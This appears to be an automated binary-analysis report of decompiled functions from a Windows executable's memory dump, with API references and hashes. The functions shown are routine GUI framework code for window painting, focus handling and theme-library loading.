                                                                            0x004342f0
                                                                            0x004342f3
                                                                            0x00434425
                                                                            0x0043442e
                                                                            0x0043442f
                                                                            0x00434431
                                                                            0x00000000
                                                                            0x00434437
                                                                            0x00434437
                                                                            0x00434438
                                                                            0x00434438
                                                                            0x0043443a
                                                                            0x00434446
                                                                            0x00434449
                                                                            0x0043444c
                                                                            0x0043444f
                                                                            0x0043447a
                                                                            0x00434451
                                                                            0x0043445e
                                                                            0x0043445e
                                                                            0x0043447d
                                                                            0x00434481
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00434517
                                                                            0x00434518
                                                                            0x00434518
                                                                            0x00434519
                                                                            0x00000000
                                                                            0x0043451f
                                                                            0x00000000
                                                                            0x0043451f
                                                                            0x00000000
                                                                            0x00434519
                                                                            0x00434499
                                                                            0x0043449e
                                                                            0x004344a0
                                                                            0x004344a7
                                                                            0x004344b2
                                                                            0x004344b4
                                                                            0x004344b4
                                                                            0x004344b9
                                                                            0x004344c1
                                                                            0x004344c4
                                                                            0x004344c6
                                                                            0x004344cc
                                                                            0x004344ce
                                                                            0x004344d5
                                                                            0x004344d5
                                                                            0x004344e1
                                                                            0x004344e8
                                                                            0x00434504
                                                                            0x0043450d
                                                                            0x004344ea
                                                                            0x004344fa
                                                                            0x004344fa
                                                                            0x004344e8
                                                                            0x004344c6
                                                                            0x004342f9
                                                                            0x004347b8
                                                                            0x004347cf
                                                                            0x004347cf
                                                                            0x004347d2
                                                                            0x004347d4
                                                                            0x004347d7
                                                                            0x004347da
                                                                            0x004347e7
                                                                            0x004347e7
                                                                            0x004342ea
                                                                            0x004342e3
                                                                            0x004342de
                                                                            0x00000000

                                                                            APIs
                                                                            • SaveDC.GDI32(?), ref: 00434584
                                                                            • RestoreDC.GDI32(?,?), ref: 004345F8
                                                                            • GetWindowDC.USER32(?,00000000,004347E8), ref: 00434672
                                                                            • SaveDC.GDI32(?), ref: 004346A9
                                                                            • RestoreDC.GDI32(?,?), ref: 00434716
                                                                            • DefWindowProcA.USER32(?,?,?,?,00000000,004347E8), ref: 004347CA
                                                                            Strings
                                                                            • PSC , xrefs: 00434562, 0043468A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: RestoreSaveWindow$Proc
                                                                            • String ID: PSC
                                                                            • API String ID: 1975259465-3988711711
                                                                            • Opcode ID: 2210b87bf067a1b2d173e421975d82a66dea5aa8cba3087decbb8f719ba20d3a
                                                                            • Instruction ID: e2bc05db2e98f798f29eef0ec9ad69615c0f825a7202cf89475d9a585c1b255b
                                                                            • Opcode Fuzzy Hash: 2210b87bf067a1b2d173e421975d82a66dea5aa8cba3087decbb8f719ba20d3a
                                                                            • Instruction Fuzzy Hash: E1E14C74A006059FCB10EFA9C5819AEF3F5EF8D304F619166E801A7361C738ED42CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
                                                                                                                                  E0044F3A8(intOrPtr __eax, struct HWND__** __edx) { 				intOrPtr _v8; 				int _v12; 				intOrPtr _v16; 				struct HDC__* _v20; 				struct HWND__* _v24; 				void* __ebp; 				struct HWND__* _t100; 				intOrPtr _t110; 				struct HWND__* _t111; 				intOrPtr _t115; 				intOrPtr _t116; 				intOrPtr _t132; 				intOrPtr _t135; 				struct HWND__* _t141; 				struct HWND__* _t144; 				intOrPtr _t148; 				struct HWND__* _t149; 				intOrPtr _t150; 				intOrPtr _t151; 				struct HWND__* _t153; 				struct HWND__* _t156; 				intOrPtr _t162; 				intOrPtr _t192; 				struct HWND__** _t221; 				void* _t224; 				struct HWND__* _t242; 				struct HWND__* _t243; 				struct HWND__* _t245; 				void* _t258; 				void* _t259; 				intOrPtr _t265; 				intOrPtr _t273; 				struct HWND__* _t277; 				struct HWND__* _t278; 				struct HWND__* _t279; 				struct HWND__* _t284; 				struct HWND__* _t285; 				struct HWND__* _t286; 				struct HWND__* _t287; 				void* _t289; 				void* _t291; 				intOrPtr _t292; 				void* _t294; 				void* _t298;  				_t289 = _t291; 				_t292 = _t291 + 0xffffffec; 				_t221 = __edx; 				_v8 = __eax; 				_t100 =  *__edx; 				_t242 = _t100; 				_t294 = _t242 - 0x46; 				if(_t294 > 0) { 					_t243 = _t242 - 0xb01a; 					__eflags = _t243; 					if(_t243 == 0) { 						__eflags =  *(_v8 + 0x94); 						if(__eflags != 0) { 							E00403B24(_v8, __eflags); 						} 					} else { 						_t245 = _t243 - 1; 						__eflags = _t245; 						if(_t245 == 0) { 							__eflags =  *(_v8 + 0x94); 							if(__eflags != 0) { 								E00403B24(_v8, __eflags); 							} 						} else { 							__eflags = _t245 == 0x2c; 							if(_t245 == 0x2c) { 								_t284 = __edx[1]; 								_t277 = 0; 								while(1) { 									__eflags = _t284; 									if(_t284 == 0) { 										break; 									} 									__eflags = _t277; 									if(_t277 == 0) { 										_t277 = E0043747C(_t284, _t224); 
										_t284 = GetParent(_t284); 										continue; 									} 									break; 								} 								__eflags = _t277; 								if(_t277 != 0) { 									_t285 = E0044CE28(_t277); 									_t110 = _v8; 									__eflags = _t277 -  *((intOrPtr*)(_t110 + 0x268)); 									if(_t277 !=  *((intOrPtr*)(_t110 + 0x268))) { 										L28: 										__eflags = _t285; 										if(_t285 != 0) { 											__eflags = _t285 - _v8; 											if(_t285 == _v8) { 												L31: 												_t111 =  *(_t285 + 0x268); 												__eflags = _t111; 												if(_t111 != 0) { 													__eflags = _t277 - _t111; 													if(_t277 != _t111) { 														__eflags = 0; 														E0043BC9C(_t111, 0, 8, 0); 													} 												} 												 *((intOrPtr*)(_t285->i + 0xf8))(); 											} else { 												_t115 =  *0x466584; // 0x27c66a0 												__eflags = _t285 -  *((intOrPtr*)(_t115 + 0x68)); 												if(_t285 !=  *((intOrPtr*)(_t115 + 0x68))) { 													goto L31; 												} 											} 										} 									} else { 										_t116 =  *0x466584; // 0x27c66a0 										__eflags = _t277 -  *((intOrPtr*)(_t116 + 0x64)); 										if(_t277 !=  *((intOrPtr*)(_t116 + 0x64))) { 											goto L28; 										} 									} 								} 							} else { 								goto L56; 							} 						} 					} 					goto L58; 				} else { 					if(_t294 == 0) { 						_t132 = _v8; 						__eflags = ( *0x44f87c & 0x0000ffff) - ( *(_t132 + 0x1c) & 0x0000ffff &  *0x44f878); 						if(( *0x44f87c & 0x0000ffff) == ( *(_t132 + 0x1c) & 0x0000ffff &  *0x44f878)) { 							_t135 = _v8; 							__eflags = ( *(_t135 + 0x278) & 0x000000ff) - 0xffffffffffffffff; 							if(( *(_t135 + 0x278) & 0x000000ff) - 0xffffffffffffffff < 0) { 								_t148 = _v8; 								__eflags =  *((char*)(_t148 + 0x273)) - 2; 								if( *((char*)(_t148 + 0x273)) != 2) { 									_t149 = __edx[2]; 									_t34 = _t149 + 0x18; 									 *_t34 =  *(_t149 + 0x18) | 0x00000002; 									__eflags =  *_t34; 								} 							} 
							_t141 = ( *(_v8 + 0x278) & 0x000000ff) - 1; 							__eflags = _t141; 							if(_t141 == 0) { 								L45: 								_t144 = ( *(_v8 + 0x271) & 0x000000ff) - 2; 								__eflags = _t144; 								if(_t144 == 0) { 									L47: 									 *( *((intOrPtr*)(_t221 + 8)) + 0x18) =  *( *((intOrPtr*)(_t221 + 8)) + 0x18) | 0x00000001; 								} else { 									__eflags = _t144 == 3; 									if(_t144 == 3) { 										goto L47; 									} 								} 							} else { 								__eflags = _t141 == 2; 								if(_t141 == 2) { 									goto L45; 								} 							} 						} 						goto L58; 					} else { 						_t258 = _t242 + 0xfffffffa - 3; 						if(_t258 < 0) { 							__eflags =  *0x4626c0; 							if( *0x4626c0 != 0) { 								__eflags =  *__edx - 7; 								if( *__edx != 7) { 									goto L58; 								} else { 									_t150 = _v8; 									__eflags =  *(_t150 + 0x1c) & 0x00000010; 									if(( *(_t150 + 0x1c) & 0x00000010) != 0) { 										goto L58; 									} else { 										_t286 = 0; 										_t151 = _v8; 										__eflags =  *((char*)(_t151 + 0x277)) - 2; 										if( *((char*)(_t151 + 0x277)) != 2) { 											_t153 =  *(_v8 + 0x268); 											__eflags = _t153; 											if(_t153 != 0) { 												__eflags = _t153 - _v8; 												if(_t153 != _v8) { 													_t286 = E004423F8(_t153); 												} 											} 										} else { 											_t156 = E0045015C(_v8); 											__eflags = _t156; 											if(_t156 != 0) { 												_t286 = E004423F8(E0045015C(_v8)); 											} 										} 										__eflags = _t286; 										if(_t286 == 0) { 											goto L58; 										} else { 											_t100 = SetFocus(_t286); 										} 									} 								} 							} 							goto L59; 						} else { 							_t259 = _t258 - 0x22; 							if(_t259 == 0) { 								_v24 = __edx[2]; 								__eflags = _v24->i - 1; 								if(_v24->i != 1) { 									goto L58; 								} else { 									_t162 = _v8; 									__eflags =  *(_t162 + 0x290); 									if( *(_t162 + 0x290) == 
0) { 										goto L58; 									} else { 										_t278 = E00433324( *((intOrPtr*)(_v8 + 0x290)), 0,  *((intOrPtr*)(_v24 + 8))); 										__eflags = _t278; 										if(_t278 == 0) { 											goto L58; 										} else { 											_v16 = E004262D8(0, 1); 											_push(_t289); 											_push(0x44f6c1); 											_push( *[fs:eax]); 											 *[fs:eax] = _t292; 											_v12 = SaveDC( *(_v24 + 0x18)); 											_push(_t289); 											_push(0x44f6a4); 											_push( *[fs:eax]); 											 *[fs:eax] = _t292; 											E004268A4(_v16,  *(_v24 + 0x18)); 											E00426738(_v16); 											E00434AAC(_t278, _v24 + 0x1c, _v16,  *(_v24 + 0x10) & 0x0000ffff); 											_pop(_t265); 											 *[fs:eax] = _t265; 											_push(0x44f6ab); 											__eflags = 0; 											E004268A4(_v16, 0); 											return RestoreDC( *(_v24 + 0x18), _v12); 										} 									} 								} 							} else { 								if(_t259 == 1) { 									_t287 = __edx[2]; 									__eflags = _t287->i - 1; 									if(_t287->i != 1) { 										goto L58; 									} else { 										_t192 = _v8; 										__eflags =  *(_t192 + 0x290); 										if( *(_t192 + 0x290) == 0) { 											goto L58; 										} else { 											_t279 = E00433324( *((intOrPtr*)(_v8 + 0x290)), 0,  *((intOrPtr*)(_t287 + 8))); 											__eflags = _t279; 											if(_t279 == 0) { 												goto L58; 											} else { 												_v20 = GetWindowDC(E004423F8(_v8)); 												 *[fs:eax] = _t292; 												_v16 = E004262D8(0, 1); 												 *[fs:eax] = _t292; 												_v12 = SaveDC(_v20); 												 *[fs:eax] = _t292; 												E004268A4(_v16, _v20); 												E00426738(_v16); 												 *((intOrPtr*)(_t279->i + 0x38))(_t287 + 0x10,  *[fs:eax], 0x44f7ab, _t289,  *[fs:eax], 0x44f7c8, _t289,  *[fs:eax], 0x44f7ef, _t289); 												_pop(_t273); 												 *[fs:eax] = _t273; 												_push(0x44f7b2); 												__eflags = 0; 												E004268A4(_v16, 0); 												return 
RestoreDC(_v20, _v12); 											} 										} 									} 								} else { 									L56: 									_t298 = _t100 -  *0x46658c; // 0xc075 									if(_t298 == 0) { 										E0043BC9C(_v8, 0, 0xb025, 0); 										E0043BC9C(_v8, 0, 0xb024, 0); 										E0043BC9C(_v8, 0, 0xb035, 0); 										E0043BC9C(_v8, 0, 0xb009, 0); 										E0043BC9C(_v8, 0, 0xb008, 0); 										E0043BC9C(_v8, 0, 0xb03d, 0); 									} 									L58: 									_t100 = E0043F7F4(_v8, _t221); 									L59: 									return _t100; 								} 							} 						} 					} 				} 			}                        

                                                                            0x0044f458
                                                                            0x0044f45a
                                                                            0x0044f45d
                                                                            0x0044f464
                                                                            0x0044f464
                                                                            0x0044f45d
                                                                            0x0044f430
                                                                            0x0044f433
                                                                            0x0044f438
                                                                            0x0044f43a
                                                                            0x0044f449
                                                                            0x0044f449
                                                                            0x0044f43a
                                                                            0x0044f466
                                                                            0x0044f468
                                                                            0x00000000
                                                                            0x0044f46e
                                                                            0x0044f46f
                                                                            0x0044f46f
                                                                            0x0044f468
                                                                            0x0044f41c
                                                                            0x0044f40f
                                                                            0x00000000
                                                                            0x0044f3cd
                                                                            0x0044f3cd
                                                                            0x0044f3d0
                                                                            0x0044f5ca
                                                                            0x0044f5d0
                                                                            0x0044f5d3
                                                                            0x00000000
                                                                            0x0044f5d9
                                                                            0x0044f5d9
                                                                            0x0044f5dc
                                                                            0x0044f5e3
                                                                            0x00000000
                                                                            0x0044f5e9
                                                                            0x0044f5ff
                                                                            0x0044f601
                                                                            0x0044f603
                                                                            0x00000000
                                                                            0x0044f609
                                                                            0x0044f615
                                                                            0x0044f61a
                                                                            0x0044f61b
                                                                            0x0044f620
                                                                            0x0044f623
                                                                            0x0044f632
                                                                            0x0044f637
                                                                            0x0044f638
                                                                            0x0044f63d
                                                                            0x0044f640
                                                                            0x0044f64c
                                                                            0x0044f65f
                                                                            0x0044f677
                                                                            0x0044f67e
                                                                            0x0044f681
                                                                            0x0044f684
                                                                            0x0044f689
                                                                            0x0044f68e
                                                                            0x0044f6a3
                                                                            0x0044f6a3
                                                                            0x0044f603
                                                                            0x0044f5e3
                                                                            0x0044f3d6
                                                                            0x0044f3d7
                                                                            0x0044f6c8
                                                                            0x0044f6cb
                                                                            0x0044f6ce
                                                                            0x00000000
                                                                            0x0044f6d4
                                                                            0x0044f6d4
                                                                            0x0044f6d7
                                                                            0x0044f6de
                                                                            0x00000000
                                                                            0x0044f6e4
                                                                            0x0044f6f7
                                                                            0x0044f6f9
                                                                            0x0044f6fb
                                                                            0x00000000
                                                                            0x0044f701
                                                                            0x0044f70f
                                                                            0x0044f71d
                                                                            0x0044f72c
                                                                            0x0044f73a
                                                                            0x0044f746
                                                                            0x0044f754
                                                                            0x0044f75d
                                                                            0x0044f770
                                                                            0x0044f783
                                                                            0x0044f788
                                                                            0x0044f78b
                                                                            0x0044f78e
                                                                            0x0044f793
                                                                            0x0044f798
                                                                            0x0044f7aa
                                                                            0x0044f7aa
                                                                            0x0044f6fb
                                                                            0x0044f6de
                                                                            0x0044f3dd
                                                                            0x0044f7f6
                                                                            0x0044f7f6
                                                                            0x0044f7fc
                                                                            0x0044f80a
                                                                            0x0044f81b
                                                                            0x0044f82c
                                                                            0x0044f83d
                                                                            0x0044f84e
                                                                            0x0044f85f
                                                                            0x0044f85f
                                                                            0x0044f864
                                                                            0x0044f869
                                                                            0x0044f86e
                                                                            0x0044f874
                                                                            0x0044f874
                                                                            0x0044f3d7
                                                                            0x0044f3d0
                                                                            0x0044f3cb
                                                                            0x0044f3bf

                                                                            APIs
                                                                            • SetFocus.USER32(00000000), ref: 0044F46F
                                                                            • SaveDC.GDI32(?), ref: 0044F62D
                                                                            • RestoreDC.GDI32(?,?), ref: 0044F69E
                                                                            • GetWindowDC.USER32(00000000), ref: 0044F70A
                                                                            • SaveDC.GDI32(?), ref: 0044F741
                                                                            • RestoreDC.GDI32(?,?), ref: 0044F7A5
                                                                            Strings
                                                                            • PSC , xrefs: 0044F60B, 0044F722
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: RestoreSave$FocusWindow
                                                                            • String ID: PSC
                                                                            • API String ID: 1553564791-3988711711
                                                                            • Opcode ID: 72769ad42fed0eb90a27f93b861efb011eea36f8f11b74f6851d10a0e592ddb5
                                                                            • Instruction ID: 0feb47b636321289c6b1ee835d5db488161481ff91a5fcd85071049a3d22871c
                                                                            • Opcode Fuzzy Hash: 72769ad42fed0eb90a27f93b861efb011eea36f8f11b74f6851d10a0e592ddb5
                                                                            • Instruction Fuzzy Hash: C9C16030A00204DFEB11EF69C586A6FB7F5EF49704F6544B6E804AB361DB38AE05DB18
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
E00442700(void* __eax) {
    void* _v28;
    struct _WINDOWPLACEMENT _v56;
    struct tagPOINT _v64;
    intOrPtr _v68;
    void* _t43;
    struct HWND__* _t45;
    struct tagPOINT* _t47;

    _t47 = &(_v64.y);
    _t43 = __eax;
    if(IsIconic( *(__eax + 0x1b4)) == 0) {
        GetWindowRect( *(_t43 + 0x1b4), _t47);
    } else {
        _v56.length = 0x2c;
        GetWindowPlacement( *(_t43 + 0x1b4), &_v56);
        asm("movsd");
        asm("movsd");
        asm("movsd");
        asm("movsd");
    }
    if((GetWindowLongA( *(_t43 + 0x1b4), 0xfffffff0) & 0x40000000) != 0) {
        _t45 = GetWindowLongA( *(_t43 + 0x1b4), 0xfffffff8);
        if(_t45 != 0) {
            ScreenToClient(_t45, _t47);
            ScreenToClient(_t45, &_v64);
        }
    }
    *(_t43 + 0x40) = _t47->x;
    *((intOrPtr*)(_t43 + 0x44)) = _v68;
    *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
    *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
    return E00439F28(_t43);
}


                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 0044270F
                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 0044272C
                                                                            • GetWindowRect.USER32 ref: 00442745
                                                                            • GetWindowLongA.USER32 ref: 00442753
                                                                            • GetWindowLongA.USER32 ref: 00442768
                                                                            • ScreenToClient.USER32 ref: 00442775
                                                                            • ScreenToClient.USER32 ref: 00442780
                                                                            Strings
                                                                            • , , xrefs: 00442718
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                            • String ID: ,
                                                                            • API String ID: 2266315723-3772416878
                                                                            • Opcode ID: ce15ff6008579e3d3c35e24131f4f0ecce661e0228d178844c8a078a25dbcd0e
                                                                            • Instruction ID: 282360e0af41cb553a3d796231ab277cfe4c42851b7561e00cc4fa463f4feb2e
                                                                            • Opcode Fuzzy Hash: ce15ff6008579e3d3c35e24131f4f0ecce661e0228d178844c8a078a25dbcd0e
                                                                            • Instruction Fuzzy Hash: EA117C71908340AFDB00DF6DC985A8B37D8AF49314F04467ABE58DB386D739E800CB66
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 57%
E00456830(void* __eax) {
    struct HWND__* _t21;
    intOrPtr* _t26;
    signed int _t29;
    intOrPtr* _t30;
    int _t33;
    intOrPtr _t36;
    void* _t54;
    int _t64;

    _t54 = __eax;
    _t21 = IsIconic( *(__eax + 0x30));
    if(_t21 != 0) {
        SetActiveWindow( *(_t54 + 0x30));
        if( *((intOrPtr*)(_t54 + 0x44)) == 0 || *((char*)(_t54 + 0x5b)) == 0 && *((char*)( *((intOrPtr*)(_t54 + 0x44)) + 0x57)) == 0) {
            L6:
            E004554C4( *(_t54 + 0x30), 9, __eflags);
        } else {
            _t64 = IsWindowEnabled(E004423F8( *((intOrPtr*)(_t54 + 0x44))));
            if(_t64 == 0) {
                goto L6;
            } else {
                DefWindowProcA( *(_t54 + 0x30), 0x112, 0xf120, 0);
            }
        }
        _t26 = *0x462c28; // 0x466310
        _t29 = *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
        if(_t64 < 0) {
            asm("adc eax, 0x0");
        }
        _t30 = *0x462c28; // 0x466310
        _t33 = *((intOrPtr*)( *_t30))(0, _t29) >> 1;
        if(_t64 < 0) {
            asm("adc eax, 0x0");
        }
        SetWindowPos( *(_t54 + 0x30), 0, _t33, ??, ??, ??, ??);
        _t36 = *((intOrPtr*)(_t54 + 0x44));
        if(_t36 != 0 && *((char*)(_t36 + 0x273)) == 1 && *((char*)(_t36 + 0x57)) == 0) {
            E00450A04(_t36, 0);
            E00453454( *((intOrPtr*)(_t54 + 0x44)));
        }
        E00455D1C(_t54);
        E00455DF8(_t54, 1);
        _t21 = *0x466584; // 0x27c66a0
        _t59 = *((intOrPtr*)(_t21 + 0x64));
        if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
            _t21 = SetFocus(E004423F8(_t59));
        }
        if( *((short*)(_t54 + 0x14a)) != 0) {
            return *((intOrPtr*)(_t54 + 0x148))();
        }
    }
    return _t21;
}


                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 00456838
                                                                            • SetActiveWindow.USER32(?,?,?,?,00456232,00000000,00456706), ref: 00456849
                                                                            • IsWindowEnabled.USER32(00000000), ref: 0045686C
                                                                            • DefWindowProcA.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00456232,00000000,00456706), ref: 00456885
                                                                            • SetWindowPos.USER32(?,00000000,00000000,?,?,00456232,00000000,00456706), ref: 004568CB
                                                                            • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00456232,00000000,00456706), ref: 00456919
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$ActiveEnabledFocusIconicProc
                                                                            • String ID:
                                                                            • API String ID: 848842217-0
                                                                            • Opcode ID: 1957795f184147772967dd2170243ba8589b1d82c817d7dd23442b436a3c44b5
                                                                            • Instruction ID: 0ae515bd5538cf6c2b81134375036770536a1319b9b68df56a487dd4935c93fd
                                                                            • Opcode Fuzzy Hash: 1957795f184147772967dd2170243ba8589b1d82c817d7dd23442b436a3c44b5
                                                                            • Instruction Fuzzy Hash: 68311270B012409BEB14BB69CD85B5A37986F04706F4904BAFD04DF2D7DA7DEC888719
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
E00422EE0(void* __edi, struct HWND__* _a4, signed int _a8) {
    struct _WINDOWPLACEMENT _v48;
    void* __ebx;
    void* __esi;
    void* __ebp;
    signed int _t19;
    intOrPtr _t21;
    struct HWND__* _t23;

    _t19 = _a8;
    _t23 = _a4;
    if( *0x466339 != 0) {
        if((_t19 & 0x00000003) == 0) {
            if(IsIconic(_t23) == 0) {
                GetWindowRect(_t23, &(_v48.rcNormalPosition));
            } else {
                GetWindowPlacement(_t23, &_v48);
            }
            return E00422E50( &(_v48.rcNormalPosition), _t19);
        }
        return 0x12340042;
    }
    _t21 = *0x466314; // 0x422ee0
    *0x466314 = E00422CE4(1, _t19, _t21, __edi, _t23);
    return *0x466314(_t23, _t19);
}


                                                                            Strings
                                                                            • MonitorFromWindow , xrefs: 00422EF7
                                                                            • .B , xrefs: 00422EFC, 00422F09, 00422F10
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID: MonitorFromWindow$.B
                                                                            • API String ID: 190572456-3321143411
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0045676C(void* __eax) {
    long _t21;
    int _t37;
    int _t39;
    struct HWND__* _t41;
    void* _t46;

    _t46 = __eax;
    _t1 = _t46 + 0x30; // 0x0
    _t21 = IsIconic( *_t1);
    if(_t21 == 0) {
        E00455CBC();
        _t2 = _t46 + 0x30; // 0x0
        SetActiveWindow( *_t2);
        E00455DF8(_t46, 0);
        if( *((intOrPtr*)(_t46 + 0x44)) == 0 ||  *((char*)(_t46 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t46 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E004423F8( *((intOrPtr*)(_t46 + 0x44)))) == 0) {
            _t15 = _t46 + 0x30; // 0x0
            _t21 = E004554C4( *_t15, 6, __eflags);
        } else {
            _t37 = E0044EDA8( *((intOrPtr*)(_t46 + 0x44)));
            _t39 = E0044ED88( *((intOrPtr*)(_t46 + 0x44)));
            _t41 = E004423F8( *((intOrPtr*)(_t46 + 0x44)));
            _t13 = _t46 + 0x30; // 0x0
            SetWindowPos( *_t13, _t41, _t39, _t37,  *( *((intOrPtr*)(_t46 + 0x44)) + 0x48), 0, 0x40);
            _t14 = _t46 + 0x30; // 0x0
            _t21 = DefWindowProcA( *_t14, 0x112, 0xf020, 0);
        }
        if( *((short*)(_t46 + 0x142)) != 0) {
            return  *((intOrPtr*)(_t46 + 0x140))();
        }
    }
    return _t21;
}

                                                                            APIs
                                                                            • IsIconic.USER32(00000000), ref: 00456773
                                                                            • SetActiveWindow.USER32(00000000,?,00456FB0), ref: 0045678B
                                                                              • Part of subcall function 00455DF8: EnumWindows.USER32(00455D88,00000000), ref: 00455E22
                                                                              • Part of subcall function 00455DF8: ShowOwnedPopups.USER32(00000000,?,00455D88,00000000,?,?,00460C02,00456799,00000000,?,00456FB0), ref: 00455E51
                                                                            • IsWindowEnabled.USER32(00000000), ref: 004567B7
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,00000000,00000040,00000000,00000000,?,00456FB0), ref: 004567EA
                                                                            • DefWindowProcA.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,00000000,00000000,?,00000000,00000040,00000000,00000000,?,00456FB0), ref: 004567FF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$ActiveEnabledEnumIconicOwnedPopupsProcShowWindows
                                                                            • String ID:
                                                                            • API String ID: 2995439034-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 90%
E0042B5CC(void* __ebx, void* __ecx) {
    char _v5;
    intOrPtr _t2;
    intOrPtr _t6;
    intOrPtr _t108;
    intOrPtr _t111;

    _t2 =  *0x466474; // 0x27ea870
    E0042B3FC(_t2);
    _push(_t111);
    _push(0x42b97f);
    _push( *[fs:eax]);
     *[fs:eax] = _t111;
     *0x466470 =  *0x466470 + 1;
    if( *0x46646c == 0) {
         *0x46646c = LoadLibraryA("uxtheme.dll");
        if( *0x46646c > 0) {
             *0x4663ac = GetProcAddress( *0x46646c, "OpenThemeData");
             *0x4663b0 = GetProcAddress( *0x46646c, "CloseThemeData");
             *0x4663b4 = GetProcAddress( *0x46646c, "DrawThemeBackground");
             *0x4663b8 = GetProcAddress( *0x46646c, "DrawThemeText");
             *0x4663bc = GetProcAddress( *0x46646c, "GetThemeBackgroundContentRect");
             *0x4663c0 = GetProcAddress( *0x46646c, "GetThemeBackgroundContentRect");
             *0x4663c4 = GetProcAddress( *0x46646c, "GetThemePartSize");
             *0x4663c8 = GetProcAddress( *0x46646c, "GetThemeTextExtent");
             *0x4663cc = GetProcAddress( *0x46646c, "GetThemeTextMetrics");
             *0x4663d0 = GetProcAddress( *0x46646c, "GetThemeBackgroundRegion");
             *0x4663d4 = GetProcAddress( *0x46646c, "HitTestThemeBackground");
             *0x4663d8 = GetProcAddress( *0x46646c, "DrawThemeEdge");
             *0x4663dc = GetProcAddress( *0x46646c, "DrawThemeIcon");
             *0x4663e0 = GetProcAddress( *0x46646c, "IsThemePartDefined");
             *0x4663e4 = GetProcAddress( *0x46646c, "IsThemeBackgroundPartiallyTransparent");
             *0x4663e8 = GetProcAddress( *0x46646c, "GetThemeColor");
             *0x4663ec = GetProcAddress( *0x46646c, "GetThemeMetric");
             *0x4663f0 = GetProcAddress( *0x46646c, "GetThemeString");
             *0x4663f4 = GetProcAddress( *0x46646c, "GetThemeBool");
             *0x4663f8 = GetProcAddress( *0x46646c, "GetThemeInt");
             *0x4663fc = GetProcAddress( *0x46646c, "GetThemeEnumValue");
             *0x466400 = GetProcAddress( *0x46646c, "GetThemePosition");
             *0x466404 = GetProcAddress( *0x46646c, "GetThemeFont");
             *0x466408 = GetProcAddress( *0x46646c, "GetThemeRect");
